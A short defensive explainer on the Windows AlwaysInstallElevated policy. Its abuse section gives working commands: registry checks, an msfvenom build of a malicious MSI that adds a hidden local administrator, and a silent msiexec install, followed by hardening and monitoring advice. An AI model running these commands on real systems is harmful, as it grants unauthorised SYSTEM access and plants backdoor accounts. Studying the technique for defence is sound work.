AlwaysInstallElevated is a Windows policy setting that, when enabled, lets any user install Windows Installer (MSI) packages with SYSTEM privileges. It is meant to let standard users install approved software, but if both the machine and user registry keys are set to 1, an attacker simply builds a malicious MSI and installs it to get a SYSTEM shell. It is one of the fastest Windows escalations when present, and the check is two registry queries.
What AlwaysInstallElevated is
AlwaysInstallElevated is a Group Policy setting that makes the Windows Installer run MSI packages with elevated (SYSTEM) privileges, even when launched by a standard user. Administrators sometimes enable it so users can install approved software without admin rights.
The problem is that it does not restrict which MSI runs elevated. If the policy is on, any package, including a malicious one the attacker crafts, installs as SYSTEM.
The abuse and payload
The attacker checks the two registry keys, then installs a crafted MSI:
- Check both keys (both must be 1):
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedand the same underHKCU. - Build a malicious MSI:
msfvenom -p windows/x64/exec CMD="net user hacker P@ss123! /add && net localgroup administrators hacker /add" -f msi -o evil.msi - Install it:
msiexec /quiet /qn /i evil.msi - The actions run as SYSTEM, creating an admin account or a shell.
Documented technique shown for defenders.
How to defend
- Do not enable AlwaysInstallElevated. It is effectively a SYSTEM-for-any-user switch.
- Audit both registry keys and set them to 0 (or unset) across the estate via Group Policy.
- Use proper software-deployment tooling that installs with controlled privileges instead.
- Apply application control (allow-listing) so unexpected MSIs cannot run.
- Monitor for msiexec installing packages from user-writable locations.